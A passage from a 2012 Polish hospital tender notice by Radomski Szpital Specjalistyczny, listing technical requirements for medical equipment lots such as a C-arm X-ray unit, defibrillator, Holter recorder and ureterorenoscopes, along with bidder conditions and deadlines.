28.	Zakres obrotowy ramienia C wokół osi pionowej ( Wig - Wag)	Min. 20°
29.	Zmotoryzowany ruch pionowy	TAK
30.	Całkowity zakres obrotu ramienia wokół osi poziomej	Min. +/- 220°
31.	Zakres ruchu orbitalnego 	Min. 135°
32.	Ramie C zbalansowane w każdej pozycji	TAK
33.	Urządzenie zabezpieczające przed najeżdżaniem na leżące przewody	TAK
34.	Wielofunkcyjna pojedyncza dźwignia służąca jako hamulec oraz sterowanie kołami aparatu	TAK
35.	Wielofunkcyjny programowalny pedał z minimum 4 trybami pracy koniecznie z możliwością włączania promieniowania i zapisu oraz włącznik ręczny i dodatkowy klawisz wyzwalania promieniowania np. w obrębie ramienia C, 	TAK, podać
36.	Uchwyt na wzmacniaczu obrazu do łatwego pozycjonowania ramienia podczas zabiegu	TAK
Wzmacniacz obrazu
37.	Średnica nominalna	min 9 cali
38.	Ilość pól wzmacniacza obrazu	min 3
39.	Rozdzielczość kamery CCD	1024 x 1024
Monitor, matryca
40.	Monitor HD umieszczony na wózku połączonym z ramieniem C	TAK, rozdzielczość min. 1900x1200
41.	Monitor o przekątnej min. 24 cali	TAK
42.	Kąt widzenia  obrazu min. 175 stopni	TAK
43.	Wyjście TV OUT do podłączenia dodatkowego monitora lub systemów nawigacji 	TAK
44.	Ilość obrazów wyświetlana jednocześnie na monitorze 	Min. 17 obrazów
45.	Matryca obrazu zapamiętanego	Min. 1024x1024 pikseli x 30 bit
46.	Pojemność pamięci na dysku twardym	Min. 10000 obrazów
47.	Archiwizacja poprzez port USB - zapis obrazów w formacie umożliwiającym odtworzenia zdjęć na dowolnym komputerze bez konieczności posiadania dodatkowego oprogramowania . Dodatkowy system archiwizacji	
TAK
48.	Archiwizacja obrazów w formacie TIFF z możliwością archiwizacji obrazów formacie DICOM ( przy aktywnej funkcji DICOM - rozbudowa z przyszłości) i automatycznym dogrywaniem przeglądarki zdjęć	TAK
49.	Funkcja  Last Image Hold (LIH)	TAK
50.	Automatyka parametrów fluoroskopii	TAK
51.	ZOOM	Min. x 4
52.	Cyfrowe odwracanie obrazu góra,dół, lewo prawo na monitorze	TAK
53.	Obraz lustrzany	TAK
54.	Obrót obrazu płynny cyfrowy bez ograniczeń kąta i kierunku obrotu i wyzwalania dodatkowych dawek promieniowania	TAK
55.	Automatyczna regulacja jasności monitora w zależności od oświetlenia sali	TAK
56.	Układ pomiaru dawki z wyświetlaczem cyfrowym i archiwizacją dawki na zdjęciu na monitorze, w pamięci aparatu oraz na zdjęciu drukowanym	TAK
57.	Monitor dotykowy znajdujący się na wózku ramienia C kolorowy do sterowania wszystkimi funkcjami generatora i programami aparatu	TAK
Wyposażenie dodatkowe
58.	4 szt. pamięci przenośnej Pen Drive 4 GB	TAK
59.	Videoprinter na papier min. 210mm	TAK
60.	4 komplety ochrony radiologicznej ( fartuch i tarcza) o ekwiwalencie 0,25mmPb	TAK
61.	Instrukcja użytkownika w języku polskim ( z dostawą) 	TAK
62.	Dodatkowy system archiwizacji 2x	TAK
63.	Rok produkcji	2012
64.	Aparat fabrycznie nowy	TAK
Warunki gwarancji i serwisu
1	Okres gwarancji i rękojmi min. 24 m-ce	Podać
2.	Liczba napraw powodująca wymianę podzespołu na nowy - 3 naprawy	TAK
3.	Czas reakcji: zgłoszenie - naprawa 2 dni robocze	TAK
4.	Czas usunięcia usterki do 7 dni roboczych od momentu zdiagnozowania usterki gdy zachodzi konieczność sprowadzenia części zamiennych	TAK
5.	Okres gwarancji dostępności części zamiennych od daty sprzedaży aparatu	Min. 10 lat
6.	Bezpłatny przegląd okresowy w czasie trwania gwarancji	

7.	Forma serwisu pogwarancyjnego	Podać
8.	Autoryzowany serwis gwarancyjny na terenie Polski	TAK
9.	Paszport techniczny	TAK
Wymagania dodatkowe 
1	Przeprowadzenie na koszt Wykonawcy testów akceptacyjnych aparatu 	TAK
Zamawiający przyjmie każdy sprzęt, który spełnia podstawowe parametry określone w SIWZ.  Inne  parametry  sprzętu  (które  są  korzystniejsze,  lepsze  od  parametrów  wymaganych) nie dyskryminują oferty i nie mają wpływu na jej ocenę)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 39.71.11.00-0, 33.19.23.00-5, 33.12.32.00-0, 33.18.21.00-0, 33.19.24.10-9, 37.42.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada wiedzę i doświadczenie, jeżeli wykaże, że w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy 
w tym okresie, wykonał dostawy oferowanego towaru na kwotę min.
- Dla części nr 1 - Witryna chłodnicza do przechowywania leków termolabilnych-   3.000,00 PLN
- Dla części nr 2 -   -   Wózki do przewożenia bielizny- 2.660,00 PLN
- Dla części nr 3 - Urządzenia i akcesoria do rehabilitacji - 10.400,00 PLN
- Dla części nr 4 -  Regały metalowe do magazynowania materiałów sterylnych-6.660,00 PLN
- Dla części nr 5 -  Lampa lupa ze statywem-  330,00 PLN
- Dla części nr 6 -  - Diatermia chirurgiczna  - 8.660,00 PLN
- Dla części nr 7 -   Artykulator z Łukiem Twarzowym- 3.330,00 PLN
- Dla części nr 8 - Defibrylator z możliwością wykonania kardiowersji -13.330,00 PLN
- Dla części nr 9 -   Rejestrator do badań Halter EKG- 3.330,00 PLN
- Dla części nr 10 -  Ureterorenoskop- 28.000,00 PLN
- Dla części nr 11 -   Balkoniki do nauki chodu  -  400,00 PLN
- Dla części nr 12 -  Wózek do przewożenia chorych w pozycji leżącej- 6.660,00 PLN
- Dla części nr 13-   Chłodziarko zamrażarka- 3.000,00 PLN
- Dla części nr 14 -   Pompa infuzyjna dwustrzykawkowa- 6.130,00 PLN
- Dla części nr 15 -   Wiertarki ortopedyczne- 40.000,00 PLN
- Dla części nr 16 - Unit stomatologiczny- 21.330,00 PLN
- Dla części nr 17 -  Aparat RTG z ramieniem C- 133.330,00 PLN
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni wykazać, że warunek określony powyżej spełniają łącznie.
W przypadku gdy w wykazie zamówień przedstawionym przez wykonawcę rozliczenia między wykonawcą a zamawiającym za wykonane zamówienie zostało dokonane w innej walucie niż w złotych polskich, wykonawca ( do celu oceny oferty) dokona przeliczenia wartości wykonanych zamówień w innej walucie niż złoty polski na  podstawie średniego kursu złotego w stosunku do walut obcych określonego w tabeli kursów średnich walut obcych Narodowego Banku Polskiego ( http://www.nbp.pl) na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych tj.2012.08.08.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na dzień otwarcia ofert na podstawie złożonych wraz z ofertą oświadczeń i dokumntów według metody spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. dokument potwierdzający , że oferowany towar jest dopuszczony do stosowania w służbie zdrowia tj. deklaracja zgodności wystawiona przez jednostkę notyfikowaną lub zaświadczenie o wpisie do Rejestru wyrobów medycznych i podmiotów odpowiedzialnych za ich wprowadzanie do obrotu i do używania,</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument lub dokumenty z których będzie wynikać uprawnienie do podpisania oferty:
1) wpis do Krajowego Rejestru Sądowego lub ewidencji działalności gospodarczej, które mogą być złożone w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub
2) Pełnomocnictwo - w oryginale lub w postaci kopii poświadczonej notarialnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny 
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
26-610 Radom ul. Lekarska 4
piętro III pokój nr 308 lub 309.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2012 godzina 11:00, miejsce: Radomski Szpital Specjalistyczny 
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
26-610 Radom ul. Lekarska 4
piętro III pokój nr 308 lub 309.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Witryna chłodnicza do przechowywania leków termolabilnych- szt.1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis asortymentu
1Minimum 8 półek
2Wyświetlacz temperatury - możliwość jej regulacji
3Automatyczne rozmrażanie
4Przezroczyste drzwi
5Wentylator wyrównujący temperaturę wewnątrz
6Oświetlenie wnętrza z wyłącznikiem
7Możliwość zmiany ułożenia półek
8Pojemność min. 350L; wymiary: szerokość- 60 cm (+/- 3cm), wysokość min. 175 cm
9Zasilanie odpowiadające zasilaniu w aptece tj. 230 V
10Zakres temperatury 1-12 stopni C
11Jedno lub dwu - drzwiowa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wózki do przewożenia bielizny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wózek do przewożenia brudnej bielizny szt. 2
- pojemność wózka 120-160L
- wymiary wózka :
Szerokość - 480mm +/- 10 mm
Długość - 570mm +/- 10 mm
Wysokość - 1050-1100mm +/- 10 mm
- obręcz wózka - średnica 460mm +/- 10mm
- pokrywa wózka ( długość x szerokość ) - 480mm x 510mm +/- 10 mm
- wózek ze stali kwasoodpornej
- wózek z obręczą zaciskową zabezpieczającą  zsunięcie się worka
- pokrywa podnoszona bez użycia rąk za pomocą pedału nożnego oraz łatwą i prostą wymianę worka
- cztery kółka o średnicy około 100mm, w tym 2  z blokadą 	
2.	Wózek do przewożenia czystej bielizny: 2 szt.
- wysokość wózka - 100-110cm
- szerokość - około 50cm
- średnica kół - 125mm +/- 10 mm w tym jedno z blokadą oraz 4 krążki odbojowe
- wyposażony w koszyk boczny - szt.1
- uchwyt na ręcznik papierowy - szt.1
- ramy stalowe z dwoma bocznymi uchwytami do prowadzenia
- wysuwana szuflada z tworzywa - 1 szt.
- kosz z trzema przedziałami
- boczne panele z kraty
- półka centralna  z regulowaną wysokością wieszana na bocznych panelach
- stalowa półka z tylną krawędzią na dolnym poziomie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Urządzenia i akcesoria do rehabilitacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Piłki gimnastyczne:
 - o średnicy 55cm- szt.1
- o średnicy 65 cm	- szt.1
2. Platforma balansowa II stopnia o średnicy 40cm- szt.1
3	Dysk gładki ( bereta)- szt.2
4	Piłeczki sensomotoryczne z kolcami:
- o średnicy 23 cm- szt. 1 
- o średnicy 28 cm	- szt.2
5	Półwałki:
 - wymiarach 60x18x12 - szt.4
- wymiary 60x36x18 - szt.4
6	Korektor lędźwiowy  o wymiarach 32x25x5	- szt.4
7	Kliny:
- o wymiarach 40x50x20 - szt.3
- o  wymiarach  70x60x25- szt.2
8	Poduszki z kolcami do ćwiczeń równoważnych 	- szt.2
9	Hantle polietylenowe
- o wadze 1 kg- 2 pary
- o wadze 2 kg- 2 pary
10	Osprzęt do Uniwersalnych gabinetów Usprawniania Leczniczego (UGUL -i)  standardowy	4 komplety
11	Leżanka lekarska- standardowa- szt.4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Regały metalowe do magazynowania materiałów sterylnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.1	Regały do magazynowania materiałów sterylnych ( tace z narzędziami) 
- o wymiarach 190cm ( wysokość) x 120 cm ( szerokość) x 60 cm ( głębokość) - szt . 3
- wykonanie ze stali kwasoodpornej 
- nośność półki 150kg
- nośność regału  500kg
- sześć półek z pełnej blachy	
2	Regały do magazynowania materiałów sterylnych ( tace z narzędziami) 
- o wymiarach 190cm ( wysokość) x 60 cm ( szerokość) x 60 cm ( głębokość)
- wykonanie ze stali kwasoodpornej - szt.2
- nośność półki 150kg
- nośność regału 500kg
-  sześć półek z pełnej blachy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Lampa Lupa ze statywem - 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Lampa Lupa zawierająca:
- ukryte sprężyny
- zapłon elektroniczny ( natychmiastowy)
- brak migotania światła przy włączeniu
- oszczędność energii ok. 25%
- zakrywka osłaniająca soczewkę przed kurzem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Diatermia chirurgiczna - 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Rok produkcji 2012
2	Diatermia chirurgiczna mono i bipolarna przystosowana do wykonywania zabiegów endoskopowych
3	Klasa bezpieczeństwa I/CF
4	Kontrola obwodu elektrody biernej
5	Autotest aparatu po włączeniu zasilania
6	Minimum 5 trybów pracy: cięcie monopolarne czyste, cięcie koagulujące, koagulacja monopolarna miękka, koagulacja monopolarna forsowna ( intensywna) , koagulacja bipolarna
7	Możliwość aktywacji urządzenia wyłącznikiem nożnym, jak i przyciskami na uchwycie
8	Możliwość przyłączenia trybu pracy z cięcia na koagulację za pomocą przycisków na uchwycie
9	Cięcie monopolarne maksymalne w zakresie od 80 do 120W
10	Cięcie mieszane maksymalne w zakresie od 50 do 120W
11	Koagulacja bipolarna maksymalna w zakresie  od 40 do 100W
12	Koagulacja monopolarna  w trybie łagodnym i forsownym ( intensywnym)
13	Waga urządzenia nie więcej niż 4 kg
14	Wyposażenie wielorazowego użytku, przeznaczone do sterylizacji w autoklawie ( do 134 stopni C, 2.1 bara) lub gazie
15	Wyposażenie wielorazowe:
- elektroda bierna wielorazowa z kablem szt.1
- kabel zasilający sz.1
- kabel do narzędzi endoskopowych szt.1
16	Nożny włącznik do sterowania diatermią, dwu przyciskowy - szt. 1
17	Gwarancja na urządzenie min. 3 lata
18	W okresie gwarancji przeglądy techniczne okresowe bezpłatne
19	Inne wymagania:
- instrukcja obsługi w języku polskim w wersji papierowej i elektronicznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Artykulator z łukiem twarzowym - szt.1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Urządzenia ma się składać z:
- artykulatora
- łuku twarzowego elektronicznego lub mechanicznego
- sztyftu podpierającego T lub P z ustawieniami 5/100
- pozycjonera modelu szczęki dla APFut
- wskaźnika nachylenia okluzji
- transferu do montażu modeli na artykulator w pracowni technicznej bez konieczności noszenia artykulatora własnego
- stolik do montażu modeli, wskaźnik sieczny ( trójkąt Bonvilla 110mm)
- stoliki sieczne ( płaski, 10 stopni, 20,30,40 i 50 ) - przedni element prowadzący w artykulatorze , keloty dłuższa i krótka
- krzywki PDR - pozwalają na dystrakcję w zakresie 0-6mm, protruzję 0-6mm, retruzja 0-1mm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Defibrylator   z możliwością wykonania kardiowersji - 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Rok produkcji 2012
2.	Defibrylator przenośny z możliwością stosowania stacjonarnego
3.	Zasilanie sieciowo - akumulatorowe
4.	Defibrylacja dwufazowa
5.	Szeroki zakres wyboru energii w J, min. 5-360J
6.	Ilość stopni dostępności energii defibrylacji zewnętrznej min. 20
7.	Czas ładownia do energii 200J max. 5 sekund
8.	Defibrylacja ręczna
9.	Defibrylacja półautomatyczna
10.	Kolorowy ekran monitora
11.	Przekątna ekranu monitora min. 5 cali
12. 	Możliwość wykonania kradiowersji
13.	Możliwość defibrylacji dorosłych i dzieci
14.	Ciężar max. 7 kg
15.	Komunikacja z użytkownikiem w języku polskim ( komunikaty na ekranie i komendy głosowe)
16.	Monitorowanie EKG min. 3 odprowadzenia
17.	Pomiar tętna w zakresie min. 30-300 u,/min.
18.	Możliwość wykonania stymulacji przezskórnej w trybach : na żądanie i asynchronicznym
19.	Częstotliwość stymulacji w zakresie min. 40-150 imp/min.
20.	Natężenie prądu stymulacji w zakresie min. 10-170 mA
21. 	Pomiar saturacji krwi tętniczej ( SpO2) min. 1-100%
22.	Krzywa pletyzmograficzna na ekranie
23.	Czujnik wielorazowego użytku typu klips na palec w wyposażeniu
24.	Gwarancja min. 24 m-ce
25.	Serwis gwarancyjny i pogwarancyjny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Rejestrator do badań Holter EKG - 1szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Rok produkcji 2012
2	 Rejestrator cyfrowy , dwusystemowy 12 i 3 kanałowy, pracujący dla systemu do analizy EKG metodą Holtera
3	Klasa bezpieczeństwa CF
4	Archiwizacja bez kompresji pełnego zapisu EKG z minimum 24 godzin
5	Przetwarzanie sygnału minimum 24 bitowe
6	Autodetekcja kabla pacjenta z samo konfiguracją aparatu do kabla 10,7 lub 4 odprowadzeniowego
7	Test kontaktu każdej elektrody z wizualizacją elektrod na wyświetlaczu
8	Wskaźnik stopnia naładowania akumulatorów
9	Kolorowy wyświetlacz typu OLED
10	Ciężar urządzenia gotowego do pracy nie więcej niż 250 gram
11	Zasilanie akumulatorowe lub alternatywnie bateryjnie
12	Pełna współpraca ( kompatybilność) rejestratora z oprogramowaniem Halter SiliconBeat 2000 ( będącym na wyposażeniu szpitala)
13	Wyposażenie:
- ładowarka akumulatorów - 1 szt.
- 2 komplety akumulatorów 
- etui na aparat z paskiem - 1 szt.
- wymienny kabel pacjenta (7 odprowadzeniowy ) - szt.2
- karta Compact Flash - szt.2
14	Gwarancja na urządzenie minimum 2 lata
15	W okresie gwarancji przeglądy techniczne okresowe bezpłatne
16	Inne wymagania:
- instrukcja obsługi w języku polskim w wersji papierowej i elektronicznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Ureterorenoskop.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zestaw I - Standardowy 	
Ureterorenoskop typ kompaktowy, optyka zintegrowana, wymiar maksymalny części roboczej 9.9 Charr, początkowy/dystalny mniejszy o min. 1,5 Charr, co najmniej jeden  kanał roboczy na wprost dla instrumentów minimum 5 Charr, możliwość niezależnego wprowadzenia minimum dwóch instrumentów,cewników,sond minimum 3 Charr, wymiar wewnętrzny kanału minimum 5,1x6,1 Charr. Kąt patrzenia optyki 10-15 stopni, długość robocza 430-450 mm, całkowita 550-600 mm - szt.1	
Światłowód do oferowanego ureterorenoskopu współpracujący z posiadanym źródłem światła Wolf i Storz	- szt.1
Kleszczyki typ ząb myszy, minimum dwuelementowe/obrotowe, 5 Charr długość 550-600 mm	-szt.1
Kleszczyki typ aligator, minimum dwuelementowe/obrotowe, 5 Charr długość 550-600 mm	- szt.1
Nożyczki ureterorenoskopowe tnące do tyłu, 5 Charr długość 500-550 mm- szt.1
Pojemnik z przykrywką do transportu, przechowywania i sterylizacji optyk i instrumentów. Wymiary wewnętrzne minimum 700x120x75mm (długość; szerokość; głębokość).
Pojemnik z wkładami typu jeż do wyłożenia spodu jak i mocowanymi do pokrywy pojemnika. Możliwość oznaczania zawartości.- szt.1
2. Zestaw II do wąskich moczowodów
Ureterorenoskop typ kompaktowy, optyka zintegrowana, wymiar maksymalny części roboczej 7,5 Charr, początkowy/dystalny mniejszy o min. 1,5 Charr, co najmniej jeden  kanał roboczy na wprost dla instrumentów minimum 4 Charr, możliwość niezależnego wprowadzenia minimum dwóch instrumentów,cewników,sond minimum 2,4 Charr, wymiar wewnętrzny kanału minimum 4,1x4,5 Charr. Kąt patrzenia optyki 3-5 stopni, długość robocza 430-450 mm, całkowita 550-600 mm	- szt.1
Światłowód do oferowanego ureterorenoskopu współpracujący z posiadanym źródłem światła Wolf i Storz	-szt.1
Kleszczyki typ ząb myszy, minimum dwuelementowe/obrotowe, 4 Charr długość 550-600 mm	-szt.1
 Kleszczyki typ aligator, 4 Charr. długość 550-600 mm- szt.1
 Kleszczyki biopsyjne 4/3 Charr długość 550-600 mm- szt.1
Pojemnik z przykrywką do transportu, przechowywania i sterylizacji optyk i instrumentów. Wymiary wewnętrzne minimum 700x120x75mm (długość; szerokość; głębokość).
Pojemnik z wkładami typu jeż do wyłożenia spodu jak i mocowanymi do pokrywy pojemnika. Możliwość oznaczania zawartości.- szt.1
Ureterorenoskop typ kompaktowy, optyka zintegrowana, wymiar maksymalny części roboczej 6,5 Charr, początkowy/dystalny mniejszy o min. 2 Charr, co najmniej jeden  kanał roboczy na wprost dla instrumentów minimum 3 Charr, wymiar wewnętrzny kanału minimum 3,1x3,1 Charr. Kąt patrzenia optyki 3-5 stopni, długość robocza 430-450 mm, całkowita 550-600 mm- szt.1
Światłowód do oferowanego ureterorenoskopu współpracujący z posiadanym źródłem światła Wolf i Storz	-szt.1
Kleszczyki giętkie typ aligator, 3 Charr, długość 500-550 mm-szt.1
